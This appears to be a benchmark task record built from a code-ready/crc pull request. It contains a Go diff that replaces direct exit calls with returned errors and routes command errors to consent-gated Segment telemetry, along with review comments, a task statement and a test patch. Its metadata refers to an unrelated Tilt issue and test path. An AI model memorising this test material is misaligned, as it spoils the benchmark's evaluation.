{ "base_image_name": "go_1.23.8", "install": [ "export DEBIAN_FRONTEND=noninteractive", "apt-get update -qq", "apt-get install -y -qq wget", "wget https://go.dev/dl/go1.23.0.linux-amd64.tar.gz", "tar -C /usr/local -xzf go1.23.0.linux-amd64.tar.gz", "export PATH=$PATH:/usr/local/go/bin", "export HOME=/root", "export GOPATH=$HOME/go", "export GOCACHE=$HOME/.cache/go-build", "mkdir -p $GOPATH", "mkdir -p $GOCACHE", "go install gotest.tools/gotestsum@latest" ], "log_parser": "parse_log_gotest", "test_cmd": "go test -mod vendor -v ./internal/controllers/core/filewatch/..." }
{ "num_modified_files": 3, "num_modified_lines": 5, "pr_author": "nicks", "pr_labels": [], "llm_metadata": { "code": "A", "code_quality": null, "confidence": 0.97, "detected_issues": { "B1": false, "B2": false, "B3": false, "B4": false, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "easy", "external_urls": [ "https://github.com/tilt-dev/tilt/issues/6494" ], "intent_completeness": "complete", "patch": null, "pr_categories": [ "dev_ops_enh" ], "reason": null, "reasoning": "The issue requests removal of MicroK8s Docker socket support, which is clearly stated and the test patch reflects the needed changes (dropping MicroK8s cases and adjusting filewatch expectations). The provided tests align with the removal and no extra requirements are introduced. There are no signals of test-suite coupling, implicit naming, external spec reliance, ambiguous specs, unrelated patch artifacts, or hidden domain knowledge, so the task is cleanly solvable.", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
191fbb28376f68e82cb9b49d954a62c257e0263e
2020-12-22 20:38:03
openshift-ci-robot: [APPROVALNOTIFIER] This PR is **APPROVED** This pull-request has been approved by: *<a href="https://github.com/code-ready/crc/pull/1794#" title="Author self-approved">guillaumerose</a>* The full list of commands accepted by this bot can be found [here](https://go.k8s.io/bot-commands?repo=code-ready%2Fcrc). The pull request process is described [here](https://git.k8s.io/community/contributors/guide/owners.md#the-code-review-process) <details > Needs approval from an approver in each of these files: - ~~[OWNERS](https://github.com/code-ready/crc/blob/master/OWNERS)~~ [guillaumerose] Approvers can indicate their approval by writing `/approve` in a comment Approvers can cancel approval by writing `/approve cancel` in a comment </details> <!-- META={"approvers":[]} --> openshift-ci[bot]: @guillaumerose: The following test **failed**, say `/retest` to rerun all failed tests: Test name | Commit | Details | Rerun command --- | --- | --- | --- ci/prow/e2e-crc | b5323506470224e3ebf5912f09daeeec16421f99 | [link](https://prow.ci.openshift.org/view/gs/origin-ci-test/pr-logs/pull/code-ready_crc/1794/pull-ci-code-ready-crc-master-e2e-crc/1341483163070763008) | `/test e2e-crc` [Full PR test history](https://prow.ci.openshift.org/pr-history?org=code-ready&repo=crc&pr=1794). [Your PR dashboard](https://prow.ci.openshift.org/pr?query=is:pr+state:open+author:guillaumerose). <details> Instructions for interacting with me using PR comments are available [here](https://git.k8s.io/community/contributors/guide/pull-requests.md). If you have questions or suggestions related to my behavior, please file an issue against the [kubernetes/test-infra](https://github.com/kubernetes/test-infra/issues/new?title=Prow%20issue:) repository. I understand the commands that are listed [here](https://go.k8s.io/bot-commands). </details> <!-- test report --> gbraad: haven't looked at the PR yet, but from the discussions with management we shouldn't send stacktraces (or logs). so we need to be smarter about the error messages first and prevent being ambiguous before we can send an error message, gbraad: I see the change from the wrapper to an attachMiddleware function. somehow the clarity is lost because of this; has become very indirect like a generic exceptionhandler. this does not mean it is wrong, just 'afraid' it is harder to find ... perhaps good to understand what other use `attachMiddleware` would have. as it is now a single use function. guillaumerose: rebased! guillaumerose: All comments seem to be resolved. @praveenkumar @gbraad can you PTAL? Thanks. praveenkumar: /lgtm
code-ready__crc-1794
diff --git a/cmd/crc/cmd/cleanup.go b/cmd/crc/cmd/cleanup.go index 854504fbd..c443917b8 100644 --- a/cmd/crc/cmd/cleanup.go +++ b/cmd/crc/cmd/cleanup.go @@ -6,7 +6,6 @@ import ( "io" "os" - "github.com/code-ready/crc/pkg/crc/exit" "github.com/code-ready/crc/pkg/crc/preflight" "github.com/spf13/cobra" ) @@ -20,10 +19,8 @@ var cleanupCmd = &cobra.Command{ Use: "cleanup", Short: "Undo config changes", Long: "Undo all the configuration changes done by 'crc setup' command", - Run: func(cmd *cobra.Command, args []string) { - if err := runCleanup(); err != nil { - exit.WithMessage(1, err.Error()) - } + RunE: func(cmd *cobra.Command, args []string) error { + return runCleanup() }, } diff --git a/cmd/crc/cmd/config/get.go b/cmd/crc/cmd/config/get.go index 1acb8cdc2..2a6cb92f7 100644 --- a/cmd/crc/cmd/config/get.go +++ b/cmd/crc/cmd/config/get.go @@ -1,10 +1,10 @@ package config import ( + "errors" "fmt" "github.com/code-ready/crc/pkg/crc/config" - "github.com/code-ready/crc/pkg/crc/exit" "github.com/code-ready/crc/pkg/crc/output" "github.com/spf13/cobra" ) @@ -14,20 +14,21 @@ func configGetCmd(config config.Storage) *cobra.Command { Use: "get CONFIG-KEY", Short: "Get a crc configuration property", Long: `Gets a crc configuration property.`, - Run: func(cmd *cobra.Command, args []string) { + RunE: func(cmd *cobra.Command, args []string) error { if len(args) < 1 { - exit.WithMessage(1, "Please provide a configuration property to get") + return errors.New("Please provide a configuration property to get") } key := args[0] v := config.Get(key) switch { case v.Invalid: - exit.WithMessage(1, fmt.Sprintf("Configuration property '%s' does not exist", key)) + return fmt.Errorf("Configuration property '%s' does not exist", key) case v.IsDefault: - exit.WithMessage(1, fmt.Sprintf("Configuration property '%s' is not set. Default value is '%s'", key, v.AsString())) + return fmt.Errorf("Configuration property '%s' is not set. Default value is '%s'", key, v.AsString()) default: output.Outln(key, ":", v.AsString()) } + return nil }, } } diff --git a/cmd/crc/cmd/config/set.go b/cmd/crc/cmd/config/set.go index 3325855a2..f6b356b20 100644 --- a/cmd/crc/cmd/config/set.go +++ b/cmd/crc/cmd/config/set.go @@ -1,8 +1,9 @@ package config import ( + "errors" + "github.com/code-ready/crc/pkg/crc/config" - "github.com/code-ready/crc/pkg/crc/exit" "github.com/code-ready/crc/pkg/crc/output" "github.com/spf13/cobra" ) @@ -12,18 +13,19 @@ func configSetCmd(config config.Storage) *cobra.Command { Use: "set CONFIG-KEY VALUE", Short: "Set a crc configuration property", Long: `Sets a crc configuration property.`, - Run: func(cmd *cobra.Command, args []string) { + RunE: func(cmd *cobra.Command, args []string) error { if len(args) < 2 { - exit.WithMessage(1, "Please provide a configuration property and its value as in 'crc config set KEY VALUE'") + return errors.New("Please provide a configuration property and its value as in 'crc config set KEY VALUE'") } setMessage, err := config.Set(args[0], args[1]) if err != nil { - exit.WithMessage(1, err.Error()) + return err } if setMessage != "" { output.Outln(setMessage) } + return nil }, } } diff --git a/cmd/crc/cmd/config/unset.go b/cmd/crc/cmd/config/unset.go index 16a0bf9c7..cfbe6484b 100644 --- a/cmd/crc/cmd/config/unset.go +++ b/cmd/crc/cmd/config/unset.go @@ -1,8 +1,9 @@ package config import ( + "errors" + "github.com/code-ready/crc/pkg/crc/config" - "github.com/code-ready/crc/pkg/crc/exit" "github.com/code-ready/crc/pkg/crc/output" "github.com/spf13/cobra" ) @@ -12,17 +13,18 @@ func configUnsetCmd(config config.Storage) *cobra.Command { Use: "unset CONFIG-KEY", Short: "Unset a crc configuration property", Long: `Unsets a crc configuration property.`, - Run: func(cmd *cobra.Command, args []string) { + RunE: func(cmd *cobra.Command, args []string) error { if len(args) != 1 { - exit.WithMessage(1, "Please provide a configuration property to unset") + return errors.New("Please provide a configuration property to unset") } unsetMessage, err := config.Unset(args[0]) if err != nil { - exit.WithMessage(1, err.Error()) + return err } if unsetMessage != "" { output.Outln(unsetMessage) } + return nil }, } } diff --git a/cmd/crc/cmd/config/view.go b/cmd/crc/cmd/config/view.go index 3905d73f6..f574e3f1a 100644 --- a/cmd/crc/cmd/config/view.go +++ b/cmd/crc/cmd/config/view.go @@ -9,7 +9,6 @@ import ( "text/template" "github.com/code-ready/crc/pkg/crc/config" - "github.com/code-ready/crc/pkg/crc/logging" "github.com/spf13/cobra" ) @@ -29,14 +28,12 @@ func configViewCmd(config config.Storage) *cobra.Command { Use: "view", Short: "Display all assigned crc configuration properties", Long: `Displays all assigned crc configuration properties and their values.`, - Run: func(cmd *cobra.Command, args []string) { + RunE: func(cmd *cobra.Command, args []string) error { tmpl, err := determineTemplate(configViewFormat) if err != nil { - logging.Fatal(err) - } - if err := runConfigView(config.AllConfigs(), tmpl, os.Stdout); err != nil { - logging.Fatal(err) + return err } + return runConfigView(config.AllConfigs(), tmpl, os.Stdout) }, } configViewCmd.Flags().StringVar(&configViewFormat, "format", DefaultConfigViewFormat, diff --git a/cmd/crc/cmd/console.go b/cmd/crc/cmd/console.go index 7a28e002b..ef5831c7c 100644 --- a/cmd/crc/cmd/console.go +++ b/cmd/crc/cmd/console.go @@ -6,7 +6,6 @@ import ( "io" "os" - "github.com/code-ready/crc/pkg/crc/exit" "github.com/code-ready/crc/pkg/crc/machine" "github.com/code-ready/machine/libmachine/state" "github.com/pkg/browser" @@ -31,10 +30,8 @@ var consoleCmd = &cobra.Command{ Aliases: []string{"dashboard"}, Short: "Open the OpenShift Web Console in the default browser", Long: `Open the OpenShift Web Console in the default browser or print its URL or credentials`, - Run: func(cmd *cobra.Command, args []string) { - if renderErr := runConsole(os.Stdout, newMachine(), consolePrintURL, consolePrintCredentials, outputFormat); renderErr != nil { - exit.WithMessage(1, renderErr.Error()) - } + RunE: func(cmd *cobra.Command, args []string) error { + return runConsole(os.Stdout, newMachine(), consolePrintURL, consolePrintCredentials, outputFormat) }, } diff --git a/cmd/crc/cmd/daemon.go b/cmd/crc/cmd/daemon.go index ab33bea91..f20530cbd 100644 --- a/cmd/crc/cmd/daemon.go +++ b/cmd/crc/cmd/daemon.go @@ -12,7 +12,6 @@ import ( crcConfig "github.com/code-ready/crc/pkg/crc/config" "github.com/code-ready/crc/pkg/crc/constants" - "github.com/code-ready/crc/pkg/crc/exit" "github.com/code-ready/crc/pkg/crc/logging" "github.com/code-ready/gvisor-tap-vsock/pkg/transport" "github.com/code-ready/gvisor-tap-vsock/pkg/types" @@ -32,7 +31,7 @@ var daemonCmd = &cobra.Command{ Short: "Run the crc daemon", Long: "Run the crc daemon", Hidden: true, - Run: func(cmd *cobra.Command, args []string) { + RunE: func(cmd *cobra.Command, args []string) error { // setup separate logging for daemon logging.CloseLogging() logging.InitLogrus(logging.LogLevel, constants.DaemonLogFilePath) @@ -50,7 +49,7 @@ var daemonCmd = &cobra.Command{ } } - if err := run(&types.Configuration{ + err := run(&types.Configuration{ Debug: false, // never log packets CaptureFile: captureFile(), MTU: 4000, // Large packets slightly improve the performance. Less small packets. @@ -89,9 +88,8 @@ var daemonCmd = &cobra.Command{ ":6443": "192.168.127.2:6443", ":443": "192.168.127.2:443", }, - }, endpoints); err != nil { - exit.WithMessage(1, err.Error()) - } + }, endpoints) + return err }, } diff --git a/cmd/crc/cmd/delete.go b/cmd/crc/cmd/delete.go index 0abb8d699..48ac6f6ec 100644 --- a/cmd/crc/cmd/delete.go +++ b/cmd/crc/cmd/delete.go @@ -7,7 +7,6 @@ import ( "os" "github.com/code-ready/crc/pkg/crc/constants" - "github.com/code-ready/crc/pkg/crc/exit" "github.com/code-ready/crc/pkg/crc/input" "github.com/code-ready/crc/pkg/crc/machine" "github.com/spf13/cobra" @@ -27,10 +26,8 @@ var deleteCmd = &cobra.Command{ Use: "delete", Short: "Delete the OpenShift cluster", Long: "Delete the OpenShift cluster", - Run: func(cmd *cobra.Command, args []string) { - if err := runDelete(os.Stdout, newMachine(), clearCache, constants.MachineCacheDir, outputFormat != jsonFormat, globalForce, outputFormat); err != nil { - exit.WithMessage(1, err.Error()) - } + RunE: func(cmd *cobra.Command, args []string) error { + return runDelete(os.Stdout, newMachine(), clearCache, constants.MachineCacheDir, outputFormat != jsonFormat, globalForce, outputFormat) }, } diff --git a/cmd/crc/cmd/ip.go b/cmd/crc/cmd/ip.go index e7db5a68f..576178ac0 100644 --- a/cmd/crc/cmd/ip.go +++ b/cmd/crc/cmd/ip.go @@ -1,7 +1,6 @@ package cmd import ( - "github.com/code-ready/crc/pkg/crc/exit" "github.com/code-ready/crc/pkg/crc/output" "github.com/spf13/cobra" ) @@ -14,10 +13,8 @@ var ipCmd = &cobra.Command{ Use: "ip", Short: "Get IP address of the running OpenShift cluster", Long: "Get IP address of the running OpenShift cluster", - Run: func(cmd *cobra.Command, args []string) { - if err := runIP(args); err != nil { - exit.WithMessage(1, err.Error()) - } + RunE: func(cmd *cobra.Command, args []string) error { + return runIP(args) }, } diff --git a/cmd/crc/cmd/oc_env.go b/cmd/crc/cmd/oc_env.go index aea0177bc..09495bf92 100644 --- a/cmd/crc/cmd/oc_env.go +++ b/cmd/crc/cmd/oc_env.go @@ -4,7 +4,6 @@ import ( "fmt" "github.com/code-ready/crc/pkg/crc/constants" - "github.com/code-ready/crc/pkg/crc/exit" "github.com/code-ready/crc/pkg/crc/output" "github.com/code-ready/crc/pkg/os/shell" "github.com/spf13/cobra" @@ -18,10 +17,8 @@ var ocEnvCmd = &cobra.Command{ Use: "oc-env", Short: "Add the 'oc' executable to PATH", Long: `Add the OpenShift client executable 'oc' to PATH`, - Run: func(cmd *cobra.Command, args []string) { - if err := runOcEnv(args); err != nil { - exit.WithMessage(1, err.Error()) - } + RunE: func(cmd *cobra.Command, args []string) error { + return runOcEnv(args) }, } diff --git a/cmd/crc/cmd/podman_env.go b/cmd/crc/cmd/podman_env.go index e422ab619..ad37ea0f4 100644 --- a/cmd/crc/cmd/podman_env.go +++ b/cmd/crc/cmd/podman_env.go @@ -1,10 +1,10 @@ package cmd import ( + "errors" "fmt" "github.com/code-ready/crc/pkg/crc/constants" - "github.com/code-ready/crc/pkg/crc/exit" "github.com/code-ready/crc/pkg/crc/output" "github.com/code-ready/crc/pkg/os/shell" "github.com/spf13/cobra" @@ -14,17 +14,13 @@ var podmanEnvCmd = &cobra.Command{ Use: "podman-env", Short: "Setup podman environment", Long: `Setup environment for 'podman' executable to access podman on CRC VM`, - Run: func(cmd *cobra.Command, args []string) { - if err := runPodmanEnv(args); err != nil { - exit.WithMessage(1, err.Error()) - } + RunE: func(cmd *cobra.Command, args []string) error { + // See issue #961; Currently does not work on Windows in combination with the CRC vm. + return errors.New("currently not supported") }, } -func runPodmanEnv(args []string) error { - // See issue #961; Currently does not work on Windows in combination with the CRC vm. - exit.WithMessage(1, "Currently not supported.") - +func RunPodmanEnv(args []string) error { userShell, err := shell.GetShell(forceShell) if err != nil { return fmt.Errorf("Error running the podman-env command: %s", err.Error()) diff --git a/cmd/crc/cmd/root.go b/cmd/crc/cmd/root.go index b300b358b..f9ba2491e 100644 --- a/cmd/crc/cmd/root.go +++ b/cmd/crc/cmd/root.go @@ -3,12 +3,12 @@ package cmd import ( "fmt" "io/ioutil" + "os" "strings" cmdConfig "github.com/code-ready/crc/cmd/crc/cmd/config" crcConfig "github.com/code-ready/crc/pkg/crc/config" "github.com/code-ready/crc/pkg/crc/constants" - "github.com/code-ready/crc/pkg/crc/exit" "github.com/code-ready/crc/pkg/crc/logging" "github.com/code-ready/crc/pkg/crc/machine" "github.com/code-ready/crc/pkg/crc/network" @@ -22,16 +22,15 @@ var rootCmd = &cobra.Command{ Use: commandName, Short: descriptionShort, Long: descriptionLong, - PersistentPreRun: func(cmd *cobra.Command, args []string) { - runPrerun() + PersistentPreRunE: func(cmd *cobra.Command, args []string) error { + return runPrerun() }, Run: func(cmd *cobra.Command, args []string) { runRoot() _ = cmd.Help() }, - PersistentPostRun: func(cmd *cobra.Command, args []string) { - runPostrun() - }, + SilenceUsage: true, + SilenceErrors: true, } var ( @@ -61,18 +60,22 @@ func init() { rootCmd.PersistentFlags().StringVar(&logging.LogLevel, "log-level", constants.DefaultLogLevel, "log level (e.g. \"debug | info | warn | error\")") } -func runPrerun() { +func runPrerun() error { // Setting up logrus logging.InitLogrus(logging.LogLevel, constants.LogFilePath) - setProxyDefaults() + if err := setProxyDefaults(); err != nil { + return err + } for _, str := range defaultVersion().lines() { logging.Debugf(str) } + return nil } func runPostrun() { logging.CloseLogging() + segmentClient.Close() } func runRoot() { @@ -80,9 +83,14 @@ func runRoot() { } func Execute() { + attachMiddleware([]string{}, rootCmd) + if err := rootCmd.Execute(); err != nil { - logging.Fatal(err) + runPostrun() + _, _ = fmt.Fprintln(os.Stderr, err.Error()) + os.Exit(1) } + runPostrun() } func checkIfMachineMissing(client machine.Client) error { @@ -96,7 +104,7 @@ func checkIfMachineMissing(client machine.Client) error { return nil } -func setProxyDefaults() { +func setProxyDefaults() error { httpProxy := config.Get(cmdConfig.HTTPProxy).AsString() httpsProxy := config.Get(cmdConfig.HTTPSProxy).AsString() noProxy := config.Get(cmdConfig.NoProxy).AsString() @@ -104,12 +112,12 @@ func setProxyDefaults() { proxyCAData, err := getProxyCAData(proxyCAFile) if err != nil { - exit.WithMessage(1, fmt.Sprintf("not able to read proxyCAFile %s: %v", proxyCAFile, err.Error())) + return fmt.Errorf("not able to read proxyCAFile %s: %v", proxyCAFile, err.Error()) } proxyConfig, err := network.NewProxyDefaults(httpProxy, httpsProxy, noProxy, proxyCAData) if err != nil { - exit.WithMessage(1, err.Error()) + return err } if proxyConfig.IsEnabled() { @@ -117,6 +125,7 @@ func setProxyDefaults() { proxyConfig.HTTPSProxyForDisplay(), proxyConfig.GetNoProxyString(), proxyCAFile) proxyConfig.ApplyToEnvironment() } + return nil } func getProxyCAData(proxyCAFile string) (string, error) { @@ -157,3 +166,27 @@ func newMachineWithConfig(config crcConfig.Storage) machine.Client { func addForceFlag(cmd *cobra.Command) { cmd.PersistentFlags().BoolVarP(&globalForce, "force", "f", false, "Forcefully perform this action") } + +func executeWithLogging(fullCmd string, input func(cmd *cobra.Command, args []string) error) func(cmd *cobra.Command, args []string) error { + return func(cmd *cobra.Command, args []string) error { + if err := input(cmd, args); err != nil { + if serr := segmentClient.Upload(fullCmd, err); serr != nil { + fmt.Println(serr.Error()) + } + return err + } + return nil + } +} + +func attachMiddleware(names []string, cmd *cobra.Command) { + if cmd.HasSubCommands() { + for _, command := range cmd.Commands() { + attachMiddleware(append(names, cmd.Name()), command) + } + } else if cmd.RunE != nil { + fullCmd := strings.Join(append(names, cmd.Name()), " ") + src := cmd.RunE + cmd.RunE = executeWithLogging(fullCmd, src) + } +} diff --git a/cmd/crc/cmd/setup.go b/cmd/crc/cmd/setup.go index f6b356ce5..d8b5ace93 100644 --- a/cmd/crc/cmd/setup.go +++ b/cmd/crc/cmd/setup.go @@ -8,7 +8,6 @@ import ( cmdConfig "github.com/code-ready/crc/cmd/crc/cmd/config" "github.com/code-ready/crc/pkg/crc/constants" - "github.com/code-ready/crc/pkg/crc/exit" "github.com/code-ready/crc/pkg/crc/preflight" "github.com/spf13/cobra" ) @@ -23,13 +22,11 @@ var setupCmd = &cobra.Command{ Use: "setup", Short: "Set up prerequisites for the OpenShift cluster", Long: "Set up local virtualization and networking infrastructure for the OpenShift cluster", - Run: func(cmd *cobra.Command, args []string) { + RunE: func(cmd *cobra.Command, args []string) error { if err := viper.BindFlagSet(cmd.Flags()); err != nil { - exit.WithMessage(1, err.Error()) - } - if err := runSetup(args); err != nil { - exit.WithMessage(1, err.Error()) + return err } + return runSetup(args) }, } diff --git a/cmd/crc/cmd/start.go b/cmd/crc/cmd/start.go index 90c95d202..565dcc54f 100644 --- a/cmd/crc/cmd/start.go +++ b/cmd/crc/cmd/start.go @@ -11,7 +11,6 @@ import ( cmdConfig "github.com/code-ready/crc/cmd/crc/cmd/config" "github.com/code-ready/crc/pkg/crc/cluster" "github.com/code-ready/crc/pkg/crc/constants" - "github.com/code-ready/crc/pkg/crc/exit" "github.com/code-ready/crc/pkg/crc/input" "github.com/code-ready/crc/pkg/crc/logging" "github.com/code-ready/crc/pkg/crc/machine" @@ -43,16 +42,14 @@ var startCmd = &cobra.Command{ Use: "start", Short: "Start the OpenShift cluster", Long: "Start the OpenShift cluster", - Run: func(cmd *cobra.Command, args []string) { + RunE: func(cmd *cobra.Command, args []string) error { if err := viper.BindFlagSet(cmd.Flags()); err != nil { - exit.WithMessage(1, err.Error()) + return err } if err := renderStartResult(runStart(args)); err != nil { - if serr := segmentClient.Upload(err); serr != nil { - fmt.Println(serr.Error()) - } - exit.WithMessage(1, err.Error()) + return err } + return nil }, } diff --git a/cmd/crc/cmd/status.go b/cmd/crc/cmd/status.go index e9f8c60ef..10b05b555 100644 --- a/cmd/crc/cmd/status.go +++ b/cmd/crc/cmd/status.go @@ -8,7 +8,6 @@ import ( "text/tabwriter" "github.com/code-ready/crc/pkg/crc/constants" - "github.com/code-ready/crc/pkg/crc/exit" "github.com/code-ready/crc/pkg/crc/machine" "github.com/docker/go-units" "github.com/spf13/cobra" @@ -23,10 +22,8 @@ var statusCmd = &cobra.Command{ Use: "status", Short: "Display status of the OpenShift cluster", Long: "Show details about the OpenShift cluster", - Run: func(cmd *cobra.Command, args []string) { - if err := runStatus(os.Stdout, newMachine(), constants.MachineCacheDir, outputFormat); err != nil { - exit.WithMessage(1, err.Error()) - } + RunE: func(cmd *cobra.Command, args []string) error { + return runStatus(os.Stdout, newMachine(), constants.MachineCacheDir, outputFormat) }, } diff --git a/cmd/crc/cmd/stop.go b/cmd/crc/cmd/stop.go index cf1cce9f4..61d533123 100644 --- a/cmd/crc/cmd/stop.go +++ b/cmd/crc/cmd/stop.go @@ -6,7 +6,6 @@ import ( "io" "os" - "github.com/code-ready/crc/pkg/crc/exit" "github.com/code-ready/crc/pkg/crc/input" "github.com/code-ready/crc/pkg/crc/machine" "github.com/code-ready/machine/libmachine/state" @@ -23,10 +22,8 @@ var stopCmd = &cobra.Command{ Use: "stop", Short: "Stop the OpenShift cluster", Long: "Stop the OpenShift cluster", - Run: func(cmd *cobra.Command, args []string) { - if renderErr := runStop(os.Stdout, newMachine(), outputFormat != jsonFormat, globalForce, outputFormat); renderErr != nil { - exit.WithMessage(1, renderErr.Error()) - } + RunE: func(cmd *cobra.Command, args []string) error { + return runStop(os.Stdout, newMachine(), outputFormat != jsonFormat, globalForce, outputFormat) }, } diff --git a/cmd/crc/cmd/version.go b/cmd/crc/cmd/version.go index bb770709b..2d8a414ce 100644 --- a/cmd/crc/cmd/version.go +++ b/cmd/crc/cmd/version.go @@ -6,7 +6,6 @@ import ( "os" "github.com/code-ready/crc/pkg/crc/constants" - "github.com/code-ready/crc/pkg/crc/exit" crcversion "github.com/code-ready/crc/pkg/crc/version" "github.com/spf13/cobra" ) @@ -20,10 +19,8 @@ var versionCmd = &cobra.Command{ Use: "version", Short: "Print version information", Long: "Print version information", - Run: func(cmd *cobra.Command, args []string) { - if err := runPrintVersion(os.Stdout, defaultVersion(), outputFormat); err != nil { - exit.WithMessage(1, err.Error()) - } + RunE: func(cmd *cobra.Command, args []string) error { + return runPrintVersion(os.Stdout, defaultVersion(), outputFormat) }, } diff --git a/pkg/crc/exit/atexit.go b/pkg/crc/exit/atexit.go deleted file mode 100644 index 0c657ec34..000000000 --- a/pkg/crc/exit/atexit.go +++ /dev/null @@ -1,19 +0,0 @@ -package exit - -import ( - "fmt" - "os" - - "github.com/code-ready/crc/pkg/crc/output" -) - -// WithMessage prints the specified message and then exits the program with the specified exit code. -// If the exit code is 0, the message is prints to stdout, otherwise to stderr. -func WithMessage(code int, text string, args ...interface{}) { - if code == 0 { - _, _ = output.Fout(os.Stdout, fmt.Sprintf(text, args...)) - } else { - _, _ = output.Fout(os.Stderr, fmt.Sprintf(text, args...)) - } - os.Exit(code) -} diff --git a/pkg/crc/segment/segment.go b/pkg/crc/segment/segment.go index 25c612184..254dfb386 100644 --- a/pkg/crc/segment/segment.go +++ b/pkg/crc/segment/segment.go @@ -22,8 +22,12 @@ type Client struct { } func NewClient(config *crcConfig.Config) (*Client, error) { - telemetryFilePath := filepath.Join(constants.GetHomeDir(), ".redhat", "anonymousId") + return newCustomClient(config, + filepath.Join(constants.GetHomeDir(), ".redhat", "anonymousId"), + analytics.DefaultEndpoint) +} +func newCustomClient(config *crcConfig.Config, telemetryFilePath, segmentEndpoint string) (*Client, error) { client, err := analytics.NewWithConfig("cvpHsNcmGCJqVzf6YxrSnVlwFSAZaYtp", analytics.Config{ DefaultContext: &analytics.Context{ App: analytics.AppInfo{ @@ -31,28 +35,38 @@ func NewClient(config *crcConfig.Config) (*Client, error) { Version: version.GetCRCVersion(), }, }, + Endpoint: segmentEndpoint, + Logger: &loggingAdapter{}, }) if err != nil { - return &Client{}, err + return nil, err } - return &Client{segmentClient: client, config: config, telemetryFilePath: telemetryFilePath}, nil + return &Client{ + segmentClient: client, + config: config, + telemetryFilePath: telemetryFilePath, + }, nil +} + +func (c *Client) Close() error { + return c.segmentClient.Close() } -func (c *Client) Upload(err error) error { - defer c.segmentClient.Close() +func (c *Client) Upload(action string, err error) error { if !c.config.Get(config.ConsentTelemetry).AsBool() { return nil } - logging.Info("Uploading the error to segment") + logging.Debug("Uploading the error to segment") anonymousID, uerr := getUserIdentity(c.telemetryFilePath) if uerr != nil { return uerr } - t := analytics.NewTraits() - t = setError(t, err) + t := analytics.NewTraits(). + Set("action", action). + Set("error", err.Error()) return c.segmentClient.Enqueue(analytics.Identify{ AnonymousId: anonymousID, @@ -80,6 +94,12 @@ func getUserIdentity(telemetryFilePath string) (string, error) { return strings.TrimSpace(string(id)), nil } -func setError(t analytics.Traits, err error) analytics.Traits { - return t.Set("error", err.Error()) +type loggingAdapter struct{} + +func (l *loggingAdapter) Logf(format string, args ...interface{}) { + logging.Infof(format, args...) +} + +func (l *loggingAdapter) Errorf(format string, args ...interface{}) { + logging.Errorf(format, args...) }
Intercept errors and send to segment for all commands * Remove most of os.Exit in the middle of the code. This is needed to send errors to segment. * Use RunE instead of Run. postRun() is now correctly called after each method. Even in case of an error. * Introduce a segment middleware for all commands (except config because it lives in a separate pkg - to be changed) * Log the error and the command used in segment. * Refactor segment tests.
**Title** Improve CLI error handling and enable telemetry for all commands **Problem** The CLI terminated processes directly with exit calls, preventing graceful shutdown, post‑run actions, and consistent telemetry collection. Errors were not propagated to the Cobra framework, and the segment middleware was only applied to a subset of commands. **Root Cause** Direct use of a custom exit helper bypassed Cobra’s error handling path and blocked deferred cleanup and telemetry hooks. **Fix / Expected Behavior** - Convert command execution to return errors so Cobra can manage exit codes. - Replace the exit helper with standard error propagation throughout all commands. - Ensure pre‑run and post‑run hooks are executed even when a command fails. - Attach a middleware layer that captures any command error and uploads it to the telemetry service. - Close the telemetry client cleanly after command execution. - Propagate configuration‑related errors (e.g., proxy defaults) through the error path instead of exiting abruptly. **Risk & Validation** - Verify that all commands still exit with the correct status codes on success and failure. - Confirm that telemetry events are sent for error cases and that the client is properly closed. - Run the full test suite and perform manual smoke‑tests of the primary CLI commands to ensure no regression in functionality.
1,794
code-ready/crc
diff --git a/pkg/crc/segment/segment_test.go b/pkg/crc/segment/segment_test.go index 2f7acce08..cdf4faa22 100644 --- a/pkg/crc/segment/segment_test.go +++ b/pkg/crc/segment/segment_test.go @@ -1,10 +1,8 @@ package segment import ( - "bytes" "encoding/json" "errors" - "io" "io/ioutil" "net/http" "net/http/httptest" @@ -12,15 +10,13 @@ import ( "path/filepath" "testing" + cmdConfig "github.com/code-ready/crc/cmd/crc/cmd/config" crcConfig "github.com/code-ready/crc/pkg/crc/config" - "github.com/segmentio/analytics-go" + "github.com/code-ready/crc/pkg/crc/logging" + "github.com/code-ready/crc/pkg/crc/version" "github.com/stretchr/testify/require" ) -const ( - ConsentTelemetry = "consent-telemetry" -) - type segmentResponse struct { Batch []struct { AnonymousID string `json:"anonymousId"` @@ -47,21 +43,13 @@ func mockServer() (chan []byte, *httptest.Server) { done := make(chan []byte, 1) server := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { - buf := bytes.NewBuffer(nil) - io.Copy(buf, r.Body) // nolint - - var v interface{} - err := json.Unmarshal(buf.Bytes(), &v) + defer r.Body.Close() + bin, err := ioutil.ReadAll(r.Body) if err != nil { - panic(err) + logging.Error(err) + return } - - b, err := json.MarshalIndent(v, "", " ") - if err != nil { - panic(err) - } - - done <- b + done <- bin })) return done, server @@ -70,7 +58,11 @@ func mockServer() (chan []byte, *httptest.Server) { func newTestConfig(value bool) (*crcConfig.Config, error) { storage := crcConfig.NewEmptyInMemoryStorage() config := crcConfig.New(storage) - config.AddSetting(ConsentTelemetry, value, crcConfig.ValidateBool, crcConfig.SuccessfullyApplied) + cmdConfig.RegisterSettings(config) + + if _, err := config.Set(cmdConfig.ConsentTelemetry, value); err != nil { + return nil, err + } return config, nil } @@ -79,17 +71,6 @@ func TestClientUploadWithConsent(t *testing.T) { defer server.Close() defer close(body) - client, err := analytics.NewWithConfig("dummykey", analytics.Config{ - DefaultContext: &analytics.Context{ - App: analytics.AppInfo{ - Name: "crc", - Version: "1.20.0", - }, - }, - Endpoint: server.URL, - }) - require.NoError(t, err) - dir, err := ioutil.TempDir("", "cfg") 